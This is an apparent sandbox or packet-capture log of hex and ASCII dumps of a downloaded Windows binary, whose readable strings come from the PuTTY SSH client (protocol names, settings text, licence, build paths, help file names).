                  2023-01-13 15:04:35 UTC915INData Raw: 62 6f 61 72 64 00 41 75 74 6f 2d 63 6f 70 79 20 73 65 6c 65 63 74 65 64 20 74 65 78 74 20 74 6f 20 73 79 73 74 65 6d 20 63 6c 69 70 62 6f 61 72 64 00 53 79 73 74 65 6d 20 63 6c 69 70 62 6f 61 72 64 00 43 26 6f 70 79 20 41 6c 6c 20 74 6f 20 43 6c 69 70 62 6f 61 72 64 00 53 74 61 6e 64 61 72 64 00 56 61 6c 69 64 69 74 79 20 70 65 72 69 6f 64 00 50 72 6f 78 79 20 65 72 72 6f 72 3a 20 55 6e 6b 6e 6f 77 6e 20 70 72 6f 78 79 20 6d 65 74 68 6f 64 00 73 65 72 76 65 72 2d 74 6f 2d 63 6c 69 65 6e 74 20 63 6f 6d 70 72 65 73 73 69 6f 6e 20 6d 65 74 68 6f 64 00 63 6c 69 65 6e 74 2d 74 6f 2d 73 65 72 76 65 72 20 63 6f 6d 70 72 65 73 73 69 6f 6e 20 6d 65 74 68 6f 64 00 50 72 6f 78 79 4d 65 74 68 6f 64 00 4d 61 6b 65 20 64 65 66 61 75 6c 74 20 73 79 73 74 65 6d 20 61 6c
                  Data Ascii: boardAuto-copy selected text to system clipboardSystem clipboardC&opy All to ClipboardStandardValidity periodProxy error: Unknown proxy methodserver-to-client compression methodclient-to-server compression methodProxyMethodMake default system al
                  2023-01-13 15:04:35 UTC923INData Raw: 5f 4d 53 47 5f 43 48 41 4e 4e 45 4c 5f 52 45 51 55 45 53 54 00 53 53 48 32 5f 4d 53 47 5f 47 4c 4f 42 41 4c 5f 52 45 51 55 45 53 54 00 53 53 48 32 5f 4d 53 47 5f 55 53 45 52 41 55 54 48 5f 52 45 51 55 45 53 54 00 53 53 48 32 5f 4d 53 47 5f 53 45 52 56 49 43 45 5f 52 45 51 55 45 53 54 00 53 53 48 31 5f 43 4d 53 47 5f 50 4f 52 54 5f 46 4f 52 57 41 52 44 5f 52 45 51 55 45 53 54 00 53 49 47 41 42 52 54 00 53 54 41 52 54 00 45 4e 43 52 59 50 54 00 50 4c 55 47 49 4e 5f 50 52 4f 54 4f 43 4f 4c 5f 41 43 43 45 50 54 00 53 53 48 32 5f 4d 53 47 5f 53 45 52 56 49 43 45 5f 41 43 43 45 50 54 00 57 4f 4e 54 00 44 4f 4e 54 00 52 45 50 52 49 4e 54 00 51 55 49 54 00 53 53 48 32 5f 4d 53 47 5f 4b 45 58 5f 44 48 5f 47 45 58 5f 49 4e 49 54 00 53 53 48 32 5f 4d 53 47 5f 4b 45
                  Data Ascii: _MSG_CHANNEL_REQUESTSSH2_MSG_GLOBAL_REQUESTSSH2_MSG_USERAUTH_REQUESTSSH2_MSG_SERVICE_REQUESTSSH1_CMSG_PORT_FORWARD_REQUESTSIGABRTSTARTENCRYPTPLUGIN_PROTOCOL_ACCEPTSSH2_MSG_SERVICE_ACCEPTWONTDONTREPRINTQUITSSH2_MSG_KEX_DH_GEX_INITSSH2_MSG_KE
                  2023-01-13 15:04:35 UTC931INData Raw: 43 37 41 42 46 35 41 45 38 43 44 42 30 39 33 33 44 37 31 45 38 43 39 34 45 30 34 41 32 35 36 31 39 44 43 45 45 33 44 32 32 36 31 41 44 32 45 45 36 42 46 31 32 46 46 41 30 36 44 39 38 41 30 38 36 34 44 38 37 36 30 32 37 33 33 45 43 38 36 41 36 34 35 32 31 46 32 42 31 38 31 37 37 42 32 30 30 43 42 42 45 31 31 37 35 37 37 41 36 31 35 44 36 43 37 37 30 39 38 38 43 30 42 41 44 39 34 36 45 32 30 38 45 32 34 46 41 30 37 34 45 35 41 42 33 31 34 33 44 42 35 42 46 43 45 30 46 44 31 30 38 45 34 42 38 32 44 31 32 30 41 39 32 31 30 38 30 31 31 41 37 32 33 43 31 32 41 37 38 37 45 36 44 37 38 38 37 31 39 41 31 30 42 44 42 41 35 42 32 36 39 39 43 33 32 37 31 38 36 41 46 34 45 32 33 43 31 41 39 34 36 38 33 34 42 36 31 35 30 42 44 41 32 35 38 33 45 39 43 41 32 41 44 34 34
                  Data Ascii: C7ABF5AE8CDB0933D71E8C94E04A25619DCEE3D2261AD2EE6BF12FFA06D98A0864D87602733EC86A64521F2B18177B200CBBE117577A615D6C770988C0BAD946E208E24FA074E5AB3143DB5BFCE0FD108E4B82D120A92108011A723C12A787E6D788719A10BDBA5B2699C327186AF4E23C1A946834B6150BDA2583E9CA2AD44
                  2023-01-13 15:04:35 UTC938INData Raw: 30 30 30 30 30 30 30 30 30 30 30 32 36 32 61 36 00 58 74 65 72 6d 20 52 36 00 30 78 36 62 31 37 64 31 66 32 65 31 32 63 34 32 34 37 66 38 62 63 65 36 65 35 36 33 61 34 34 30 66 32 37 37 30 33 37 64 38 31 32 64 65 62 33 33 61 30 66 34 61 31 33 39 34 35 64 38 39 38 63 32 39 36 00 68 6d 61 63 2d 73 68 61 31 2d 39 36 00 30 78 30 30 63 36 38 35 38 65 30 36 62 37 30 34 30 34 65 39 63 64 39 65 33 65 63 62 36 36 32 33 39 35 62 34 34 32 39 63 36 34 38 31 33 39 30 35 33 66 62 35 32 31 66 38 32 38 61 66 36 30 36 62 34 64 33 64 62 61 61 31 34 62 35 65 37 37 65 66 65 37 35 39 32 38 66 65 31 64 63 31 32 37 61 32 66 66 61 38 64 65 33 33 34 38 62 33 63 31 38 35 36 61 34 32 39 62 66 39 37 65 37 65 33 31 63 32 65 35 62 64 36 36 00 30 78 66 66 66 66 66 66 66 66 66 66 66 66
                  Data Ascii: 00000000000262a6Xterm R60x6b17d1f2e12c4247f8bce6e563a440f277037d812deb33a0f4a13945d898c296hmac-sha1-960x00c6858e06b70404e9cd9e3ecb662395b4429c648139053fb521f828af606b4d3dbaa14b5e77efe75928fe1dc127a2ffa8de3348b3c1856a429bf97e7e31c2e5bd660xffffffffffff
                  2023-01-13 15:04:35 UTC946INData Raw: 67 20 61 20 63 6f 70 79 20 6f 66 20 74 68 69 73 20 73 6f 66 74 77 61 72 65 20 61 6e 64 20 61 73 73 6f 63 69 61 74 65 64 20 64 6f 63 75 6d 65 6e 74 61 74 69 6f 6e 20 66 69 6c 65 73 20 28 74 68 65 20 22 53 6f 66 74 77 61 72 65 22 29 2c 20 74 6f 20 64 65 61 6c 20 69 6e 20 74 68 65 20 53 6f 66 74 77 61 72 65 20 77 69 74 68 6f 75 74 20 72 65 73 74 72 69 63 74 69 6f 6e 2c 20 69 6e 63 6c 75 64 69 6e 67 20 77 69 74 68 6f 75 74 20 6c 69 6d 69 74 61 74 69 6f 6e 20 74 68 65 20 72 69 67 68 74 73 20 74 6f 20 75 73 65 2c 20 63 6f 70 79 2c 20 6d 6f 64 69 66 79 2c 20 6d 65 72 67 65 2c 20 70 75 62 6c 69 73 68 2c 20 64 69 73 74 72 69 62 75 74 65 2c 20 73 75 62 6c 69 63 65 6e 73 65 2c 20 61 6e 64 2f 6f 72 20 73 65 6c 6c 20 63 6f 70 69 65 73 20 6f 66 20 74 68 65 20 53 6f 66
                  Data Ascii: g a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Sof
                  2023-01-13 15:04:35 UTC954INData Raw: 74 68 65 20 75 70 73 74 72 65 61 6d 20 50 75 54 54 59 29 00 31 20 28 49 4e 53 45 43 55 52 45 29 00 43 6f 6e 74 72 6f 6c 2d 3f 20 28 31 32 37 29 00 20 28 49 50 76 36 29 00 20 28 49 50 76 34 29 00 20 32 30 32 32 20 28 31 37 2e 32 29 00 41 74 74 65 6d 70 74 20 22 6b 65 79 62 6f 61 72 64 2d 69 6e 74 65 72 61 63 74 69 76 65 22 20 61 75 74 68 20 28 53 53 48 2d 32 29 00 49 6e 76 61 6c 69 64 20 6e 75 6d 62 65 72 20 6f 66 20 73 74 6f 70 20 62 69 74 73 20 28 6e 65 65 64 20 31 2c 20 31 2e 35 20 6f 72 20 32 29 00 41 74 74 65 6d 70 74 20 54 49 53 20 6f 72 20 43 72 79 70 74 6f 43 61 72 64 20 61 75 74 68 20 28 53 53 48 2d 31 29 00 7a 6c 69 62 20 28 52 46 43 31 39 35 30 29 00 53 4f 43 4b 53 20 70 72 6f 78 79 20 72 65 73 70 6f 6e 73 65 20 63 6f 6e 74 61 69 6e 65 64 20 72
                  Data Ascii: the upstream PuTTY)1 (INSECURE)Control-? (127) (IPv6) (IPv4) 2022 (17.2)Attempt "keyboard-interactive" auth (SSH-2)Invalid number of stop bits (need 1, 1.5 or 2)Attempt TIS or CryptoCard auth (SSH-1)zlib (RFC1950)SOCKS proxy response contained r
                  2023-01-13 15:04:35 UTC962INData Raw: 00 73 00 73 00 65 00 73 00 00 00 63 00 6f 00 75 00 6e 00 74 00 32 00 33 00 34 00 28 00 74 00 65 00 72 00 6d 00 2d 00 3e 00 73 00 63 00 72 00 6f 00 6c 00 6c 00 62 00 61 00 63 00 6b 00 29 00 20 00 3c 00 3d 00 20 00 6e 00 65 00 77 00 73 00 61 00 76 00 65 00 6c 00 69 00 6e 00 65 00 73 00 00 00 73 00 62 00 6c 00 65 00 6e 00 20 00 3e 00 3d 00 20 00 74 00 65 00 72 00 6d 00 2d 00 3e 00 74 00 65 00 6d 00 70 00 73 00 62 00 6c 00 69 00 6e 00 65 00 73 00 00 00 63 00 6f 00 75 00 6e 00 74 00 32 00 33 00 34 00 28 00 74 00 65 00 72 00 6d 00 2d 00 3e 00 73 00 63 00 72 00 6f 00 6c 00 6c 00 62 00 61 00 63 00 6b 00 29 00 20 00 3e 00 3d 00 20 00 74 00 65 00 72 00 6d 00 2d 00 3e 00 74 00 65 00 6d 00 70 00 73 00 62 00 6c 00 69 00 6e 00 65 00 73 00 00 00 69 00 6e 00 64 00 65 00
                  Data Ascii: ssescount234(term->scrollback) <= newsavelinessblen >= term->tempsblinescount234(term->scrollback) >= term->tempsblinesinde
                  2023-01-13 15:04:35 UTC970INData Raw: 00 73 00 65 00 74 00 74 00 69 00 6e 00 67 00 73 00 2e 00 63 00 00 00 2f 00 68 00 6f 00 6d 00 65 00 2f 00 73 00 69 00 6d 00 6f 00 6e 00 2f 00 6d 00 65 00 6d 00 2f 00 2e 00 62 00 75 00 69 00 6c 00 64 00 2f 00 77 00 6f 00 72 00 6b 00 64 00 69 00 72 00 73 00 2f 00 62 00 6f 00 62 00 2d 00 6a 00 6d 00 63 00 35 00 6f 00 77 00 78 00 61 00 2f 00 70 00 75 00 74 00 74 00 79 00 2f 00 63 00 72 00 79 00 70 00 74 00 6f 00 2f 00 61 00 72 00 63 00 66 00 6f 00 75 00 72 00 2e 00 63 00 00 00 2f 00 68 00 6f 00 6d 00 65 00 2f 00 73 00 69 00 6d 00 6f 00 6e 00 2f 00 6d 00 65 00 6d 00 2f 00 2e 00 62 00 75 00 69 00 6c 00 64 00 2f 00 77 00 6f 00 72 00 6b 00 64 00 69 00 72 00 73 00 2f 00 62 00 6f 00 62 00 2d 00 6a 00 6d 00 63 00 35 00 6f 00 77 00 78 00 61 00 2f 00 70 00 75 00 74 00
                  Data Ascii: settings.c/home/simon/mem/.build/workdirs/bob-jmc5owxa/putty/crypto/arcfour.c/home/simon/mem/.build/workdirs/bob-jmc5owxa/put
                  2023-01-13 15:04:35 UTC977INData Raw: 00 72 00 73 00 2f 00 62 00 6f 00 62 00 2d 00 6a 00 6d 00 63 00 35 00 6f 00 77 00 78 00 61 00 2f 00 70 00 75 00 74 00 74 00 79 00 2f 00 73 00 73 00 68 00 2f 00 63 00 6f 00 6e 00 6e 00 65 00 63 00 74 00 69 00 6f 00 6e 00 31 00 2e 00 63 00 00 00 2f 00 68 00 6f 00 6d 00 65 00 2f 00 73 00 69 00 6d 00 6f 00 6e 00 2f 00 6d 00 65 00 6d 00 2f 00 2e 00 62 00 75 00 69 00 6c 00 64 00 2f 00 77 00 6f 00 72 00 6b 00 64 00 69 00 72 00 73 00 2f 00 62 00 6f 00 62 00 2d 00 6a 00 6d 00 63 00 35 00 6f 00 77 00 78 00 61 00 2f 00 70 00 75 00 74 00 74 00 79 00 2f 00 73 00 73 00 68 00 2f 00 6c 00 6f 00 67 00 69 00 6e 00 31 00 2e 00 63 00 00 00 72 00 65 00 74 00 20 00 3d 00 3d 00 20 00 63 00 00 00 73 00 73 00 68 00 2d 00 3e 00 67 00 73 00 73 00 5f 00 73 00 74 00 61 00 74 00 65 00
                  Data Ascii: rs/bob-jmc5owxa/putty/ssh/connection1.c/home/simon/mem/.build/workdirs/bob-jmc5owxa/putty/ssh/login1.cret == cssh->gss_state
                  2023-01-13 15:04:35 UTC985INData Raw: 00 74 00 5f 00 65 00 72 00 72 00 28 00 73 00 72 00 63 00 29 00 00 00 6c 00 65 00 6e 00 20 00 3c 00 3d 00 20 00 73 00 69 00 7a 00 65 00 6f 00 66 00 28 00 73 00 2d 00 3e 00 6f 00 6f 00 62 00 64 00 61 00 74 00 61 00 29 00 00 00 78 00 2d 00 3e 00 6e 00 77 00 20 00 3c 00 20 00 28 00 7e 00 28 00 73 00 69 00 7a 00 65 00 5f 00 74 00 29 00 31 00 29 00 20 00 2f 00 20 00 28 00 31 00 34 00 36 00 20 00 2a 00 20 00 42 00 49 00 47 00 4e 00 55 00 4d 00 5f 00 49 00 4e 00 54 00 5f 00 42 00 49 00 54 00 53 00 29 00 00 00 4e 00 55 00 4c 00 4c 00 20 00 3d 00 3d 00 20 00 66 00 69 00 6e 00 64 00 32 00 33 00 34 00 28 00 73 00 68 00 61 00 72 00 65 00 73 00 74 00 61 00 74 00 65 00 2d 00 3e 00 63 00 6f 00 6e 00 6e 00 65 00 63 00 74 00 69 00 6f 00 6e 00 73 00 2c 00 20 00 26 00 64 00
                  Data Ascii: t_err(src)len <= sizeof(s->oobdata)x->nw < (~(size_t)1) / (146 * BIGNUM_INT_BITS)NULL == find234(sharestate->connections, &d
                  2023-01-13 15:04:35 UTC993INData Raw: 63 79 47 65 74 57 69 6e 64 6f 77 69 6e 67 4d 6f 64 65 6c 00 00 5f 5f 63 64 65 63 6c 00 5f 5f 70 61 73 63 61 6c 00 00 00 00 49 6d 70 72 6f 70 65 72 20 6c 69 6e 6b 00 00 00 6e 6f 20 6c 69 6e 6b 00 49 6e 76 61 6c 69 64 20 73 65 65 6b 00 00 00 00 6f 70 65 72 61 74 69 6f 6e 20 77 6f 75 6c 64 20 62 6c 6f 63 6b 00 00 00 46 72 69 00 5f 5f 65 61 62 69 00 00 63 6f 73 68 00 00 00 00 73 69 6e 68 00 00 00 00 74 61 6e 68 00 00 00 00 4d 61 72 63 68 00 00 00 41 75 67 00 6c 6f 67 00 41 72 67 20 6c 69 73 74 20 74 6f 6f 20 6c 6f 6e 67 00 00 00 46 69 6c 65 6e 61 6d 65 20 74 6f 6f 20 6c 6f 6e 67 00 00 00 69 6e 66 00 6d 6f 64 66 00 00 00 00 6d 65 73 73 61 67 65 20 73 69 7a 65 00 00 00 00 46 6c 73 53 65 74 56 61 6c 75 65 00 46 6c 73 47 65 74 56 61 6c 75 65 00 54 75 65 00 20 64
                  Data Ascii: cyGetWindowingModel__cdecl__pascalImproper linkno linkInvalid seekoperation would blockFri__eabicoshsinhtanhMarchAuglogArg list too longFilename too longinfmodfmessage sizeFlsSetValueFlsGetValueTue d
                  2023-01-13 15:04:35 UTC1001INData Raw: 00 74 00 61 00 00 00 00 00 65 00 6e 00 67 00 6c 00 69 00 73 00 68 00 2d 00 75 00 73 00 61 00 00 00 61 00 72 00 2d 00 73 00 61 00 00 00 73 00 61 00 00 00 00 00 61 00 72 00 2d 00 71 00 61 00 00 00 65 00 73 00 2d 00 70 00 61 00 00 00 70 00 61 00 00 00 00 00 73 00 70 00 61 00 6e 00 69 00 73 00 68 00 2d 00 61 00 72 00 67 00 65 00 6e 00 74 00 69 00 6e 00 61 00 00 00 70 00 72 00 2d 00 63 00 68 00 69 00 6e 00 61 00 00 00 00 00 70 00 72 00 20 00 63 00 68 00 69 00 6e 00 61 00 00 00 00 00 63 00 68 00 69 00 6e 00 61 00 00 00 73 00 70 00 61 00 6e 00 69 00 73 00 68 00 2d 00 70 00 61 00 6e 00 61 00 6d 00 61 00 00 00 00 00 61 00 72 00 2d 00 6d 00 61 00 00 00 73 00 70 00 61 00 6e 00 69 00 73 00 68 00 2d 00 76 00 65 00 6e 00 65 00 7a 00 75 00 65 00 6c 00 61 00 00 00 73 00
                  Data Ascii: taenglish-usaar-sasaar-qaes-papaspanish-argentinapr-chinapr chinachinaspanish-panamaar-maspanish-venezuelas
                  2023-01-13 15:04:35 UTC1009INData Raw: 00 b0 ed 0f 00 c4 ed 0f 00 dc ed 0f 00 ec ed 0f 00 fc ed 0f 00 1a ee 0f 00 2c ee 0f 00 40 ee 0f 00 4c ee 0f 00 56 ee 0f 00 64 ee 0f 00 72 ee 0f 00 8e ee 0f 00 a0 ee 0f 00 b6 ee 0f 00 c8 ee 0f 00 de ee 0f 00 ee ee 0f 00 00 00 00 00 fa ee 0f 00 00 00 00 00 0a ef 0f 00 1a ef 0f 00 28 ef 0f 00 3c ef 0f 00 00 00 00 00 50 ef 0f 00 6c ef 0f 00 76 ef 0f 00 82 ef 0f 00 92 ef 0f 00 a2 ef 0f 00 c2 ef 0f 00 d0 ef 0f 00 e2 ef 0f 00 f2 ef 0f 00 00 f0 0f 00 0e f0 0f 00 1e f0 0f 00 32 f0 0f 00 44 f0 0f 00 60 f0 0f 00 00 00 00 00 13 00 42 69 74 42 6c 74 00 00 29 00 43 72 65 61 74 65 42 69 74 6d 61 70 00 00 30 00 43 72 65 61 74 65 43 6f 6d 70 61 74 69 62 6c 65 42 69 74 6d 61 70 00 00 31 00 43 72 65 61 74 65 43 6f 6d 70 61 74 69 62 6c 65 44 43 00 00 3f 00 43 72 65 61 74 65
                  Data Ascii: ,@LVdr(<Plv2D`BitBlt)CreateBitmap0CreateCompatibleBitmap1CreateCompatibleDC?Create
                  2023-01-13 15:04:35 UTC1017INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 fe ff ff ff 00 00 00 00 d0 ff ff ff 00 00 00 00 fe ff ff ff df 19 4c 00 e3 19 4c 00 00 00 00 00 fe ff ff ff 00 00 00 00 d8 ff ff ff 00 00 00 00 fe ff ff ff 8c 1a 4c 00 90 1a 4c 00 00 00 00 00 fe ff ff ff 00 00 00 00 d8 ff ff ff 00 00 00 00 fe ff ff ff 7e 28 4c 00 9a 28 4c 00 00 00 00 00 fe ff ff ff 00 00 00 00 c8 ff ff ff 00 00 00 00 fe ff ff ff 00 00 00 00 07 2b 4c 00 00 00 00 00 fe ff ff ff 00 00 00 00 d0 ff ff ff 00 00 00 00 fe ff ff ff 00 00 00 00 50 30 4c 00 00 00 00 00 fe ff ff ff 00 00 00 00 d8 ff ff ff 00 00 00 00 fe ff ff ff 00 00 00 00 34 3a 4c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                  Data Ascii: LLLL~(L(L+LP0L4:L
                  2023-01-13 15:04:35 UTC1024INData Raw: ff f0 bb 00 88 80 00 00 00 00 00 00 00 00 00 00 00 00 00 00 77 77 77 77 77 77 0b bb 08 80 00 00 00 00 00 00 00 00 00 00 00 00 00 00 07 77 77 77 77 77 70 0b b0 80 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 bb 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0b bb 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 bb bb bb bb bb b0 88 88 88 88 88 88 88 88 00 00 00 00 00 00 00 00 00 00 00 bb bb bb bb bb 08 88 88 88 88 88 88 88 80 00 00 00 00 00 00 00 00 00 00 0b bb bb bb bb b0 07 78 00 00 00 07 88 88 00 00 00 00 00 00 00 00 00 00 00 bb bb bb bb bb b0 ff ff ff ff ff 78 88 80 00 00 00 00 00 00 00 00 00 0f 0b bb 00 00 00 0f ff ff ff ff ff f7 88 80 00 00 00 00 00 00 00 00 00 00 70 0b b0 00 00 00 00 00 00 00 07 ff
                  Data Ascii: wwwwwwwwwwwpxxp
                  2023-01-13 15:04:35 UTC1032INData Raw: 67 2d 63 74 72 6c 61 6c 74 2e 68 74 6d 6c 01 8c c1 35 8c 2b 13 2f 63 6f 6e 66 69 67 2d 63 75 72 73 6f 72 2e 68 74 6d 6c 01 8e b6 12 87 45 10 2f 63 6f 6e 66 69 67 2d 63 79 72 2e 68 74 6d 6c 01 8f c8 52 87 50 11 2f 63 6f 6e 66 69 67 2d 64 61 74 61 2e 68 74 6d 6c 01 92 be 3e 8a 12 12 2f 63 6f 6e 66 69 67 2d 64 65 63 6f 6d 2e 68 74 6d 6c 01 8a dd 5b 8f 19 14 2f 63 6f 6e 66 69 67 2d 65 6e 76 69 72 6f 6e 2e 68 74 6d 6c 01 92 f5 21 8c 0f 12 2f 63 6f 6e 66 69 67 2d 65 72 61 73 65 2e 68 74 6d 6c 01 8b 80 03 8d 03 1e 2f 63 6f 6e 66 69 67 2d 65 72 61 73 65 74 6f 73 63 72 6f 6c 6c 62 61 63 6b 2e 68 74 6d 6c 01 8e a4 57 89 0f 1f 2f 63 6f 6e 66 69 67 2d 66 65 61 74 75 72 65 73 2d 61 6c 74 73 63 72 65 65 6e 2e 68 74 6d 6c 01 8d af 07 89 48 21 2f 63 6f 6e 66 69 67 2d 66
                  Data Ascii: g-ctrlalt.html5+/config-cursor.htmlE/config-cyr.htmlRP/config-data.html>/config-decom.html[/config-environ.html!/config-erase.html/config-erasetoscrollback.htmlW/config-features-altscreen.htmlH!/config-f
                  2023-01-13 15:04:35 UTC1040INData Raw: 66 61 71 2d 76 62 2e 68 74 6d 6c 01 ad 95 6a 88 52 10 2f 66 61 71 2d 76 65 6e 64 6f 72 2e 68 74 6d 6c 01 b3 91 5a 9b 00 15 2f 66 61 71 2d 76 69 72 74 75 61 6c 6c 6f 63 6b 2e 68 74 6d 6c 01 b1 aa 2d 88 16 14 2f 66 61 71 2d 77 65 62 68 6f 73 74 69 6e 67 2e 68 74 6d 6c 01 b1 e4 03 84 70 0e 2f 66 61 71 2d 77 68 61 74 2e 68 74 6d 6c 01 ab a3 13 89 51 0f 2f 66 61 71 2d 77 69 6e 33 31 2e 68 74 6d 6c 01 ac e2 26 89 35 0f 2f 66 61 71 2d 77 69 6e 63 65 2e 68 74 6d 6c 01 ac dc 4e 85 58 16 2f 66 61 71 2d 77 69 6e 64 6f 77 73 73 74 6f 72 65 2e 68 74 6d 6c 01 b1 b2 43 89 44 12 2f 66 61 71 2d 77 69 6e 74 69 74 6c 65 2e 68 74 6d 6c 01 af ea 14 89 0c 13 2f 66 61 71 2d 78 70 77 6f 6e 74 72 75 6e 2e 68 74 6d 6c 01 b0 dd 36 87 5a 09 2f 66 61 71 2e 68 74 6d 6c 01 aa c1 68 dc
                  Data Ascii: faq-vb.htmljR/faq-vendor.htmlZ/faq-virtuallock.html-/faq-webhosting.htmlp/faq-what.htmlQ/faq-win31.html&5/faq-wince.htmlNX/faq-windowsstore.htmlCD/faq-wintitle.html/faq-xpwontrun.html6Z/faq.htmlh
                  2023-01-13 15:04:35 UTC1048INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                  Data Ascii:
                  2023-01-13 15:04:35 UTC1056INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                  Data Ascii:
                  2023-01-13 15:04:35 UTC1063INData Raw: e4 de 7c 03 f6 33 92 11 32 38 16 67 10 14 45 68 de db e3 7e 0c 62 4f 68 aa 59 d6 97 ef 82 be d1 07 c0 4c 1c 57 e9 35 eb aa 4d 7b 9a 01 df 5e 54 90 f4 a2 38 c3 de a1 77 c5 63 e2 5b ef 7f 78 cb 5e ad a0 79 7d 50 de 25 22 bd e6 f5 f0 1f 4d 89 a4 12 b7 27 96 d1 62 3d af ee 45 de c2 8f 78 e2 9b 67 93 cd b2 d7 ab 5a dd 15 88 21 f9 8d 05 37 e5 e0 6e 59 2b 01 a2 00 99 96 ec f5 aa a3 00 f4 bb 07 83 a8 67 dd d5 8a ea 0b d6 ec 2c 53 65 49 50 05 c5 4e d4 0c d0 e2 e7 48 4a 06 be 98 c9 b3 65 72 b4 88 2a e6 6b 82 d4 25 e1 38 d9 b3 14 8b 58 90 c5 eb 0c 76 43 1f e2 44 8a a8 92 0e 66 6b 32 b9 f5 d9 8e f7 5a a4 ce f9 a4 2b eb 72 2c 37 ed f5 c6 ee b3 12 3b fb aa 56 be ae 05 a8 dd 60 71 d1 71 68 7c 09 e3 d5 ed 6c 2a 50 53 e6 af 8b fe 22 31 82 cb 39 8b e3 4a f3 25 f1 b5 b3 ab
                  Data Ascii: |328gEh~bOhYLW5M{^T8wc[x^y}P%"M'b=ExgZ!7nY+g,SeIPNHJer*k%8XvCDfk2Z+r,7;V`qqh|l*PS"19J%
                  2023-01-13 15:04:35 UTC1071INData Raw: b9 ae 9a 1e 23 4e 00 c3 a5 7b 98 9d 2c 03 36 3d 99 42 ee 4e dd a4 f1 42 c4 4d d2 be c2 17 28 c4 8c d8 3b e5 0e ba 8d d5 d7 e8 27 76 aa 70 df ac 52 80 d6 7e 5d b0 bb 93 c1 a7 de 22 ee da 16 38 6b 41 56 a9 31 d4 a8 05 c4 8d 75 ff b5 19 f3 ca 34 6c 74 a7 17 cf 96 37 eb 17 a7 41 d2 c3 59 ee b8 f2 6d f7 37 2c f4 44 eb 16 4f a0 db c1 9d d3 5b b3 ca d1 7d 1d a2 9d a8 bb e0 2a f2 62 66 03 c2 a6 f8 ab 31 c8 0d 49 d8 9d a1 2f 0a 51 19 06 01 b9 88 66 80 df 06 30 ce a9 d0 39 7f b7 f1 0d 96 b3 32 70 0f 91 b3 0a d6 46 a3 fa 43 80 db 6a 0d 7b f3 02 65 c3 d5 e5 f4 bb 7e 78 57 9d 5d b3 91 ec 06 23 ca 1d 2e 43 4e 4d 54 fd e5 dd 2e fd ee 5c a4 af ef 56 be ee 58 2e e2 3c 56 bb 18 cf 47 e3 7f e0 8b 4d 61 ef 25 58 59 10 a5 d8 53 a9 fa 5f 8f a8 7f eb 8b 45 64 93 fd 86 c1 33 33
                  Data Ascii: #N{,6=BNBM(;'vpR~]"8kAV1u4lt7AYm7,DO[}*bf1I/Qf092pFCj{e~xW]#.CNMT.\VX.<VGMa%XYS_Ed33
                  2023-01-13 15:04:35 UTC1079INData Raw: 9f d1 1b 4d 8c 10 c4 86 47 0a 3b fa 05 6a fa 7a ed 09 c7 8e 73 7f 3c c9 eb a0 84 a7 91 ec 9d ba dd a7 fb 04 50 49 f3 31 3f b3 ef b2 52 49 f5 f6 bd e2 6c 19 fb 43 4e 44 82 23 8e 96 4a eb e9 ca d2 5b cd ed 2d 13 7a be 32 a1 e1 7b 87 57 a3 c1 ba a4 53 97 3c bd d1 64 5e 9b 54 82 e3 97 6e 8f 4e 50 10 64 12 ef ef b7 51 9b 72 ce 1d 1b 35 93 d9 9e 44 84 3f e5 db f9 5b b2 86 ae b8 0c f3 8d a1 b1 58 7b e3 11 bc 27 57 fb c0 ce 92 a6 7b 42 e3 24 28 ab 5f df f7 7a 5a 1c ec ca db c6 60 f0 71 34 1f 34 f8 98 cb b4 62 ab da e3 52 44 fd e9 fd 2c 3a bd 6f 28 bd 8e de 9c 8d 23 58 6b 0d 64 6b df c6 0b 4d a9 42 6a 67 85 b9 e2 a4 d5 84 5e 0c 64 72 f1 40 b0 b8 d4 50 44 41 90 41 df 7c 60 88 a0 b4 9d 66 28 64 f5 a8 39 01 cb 88 eb 62 09 1a ce 31 94 54 bc a2 dc d4 2d 37 1f 1f f7 14
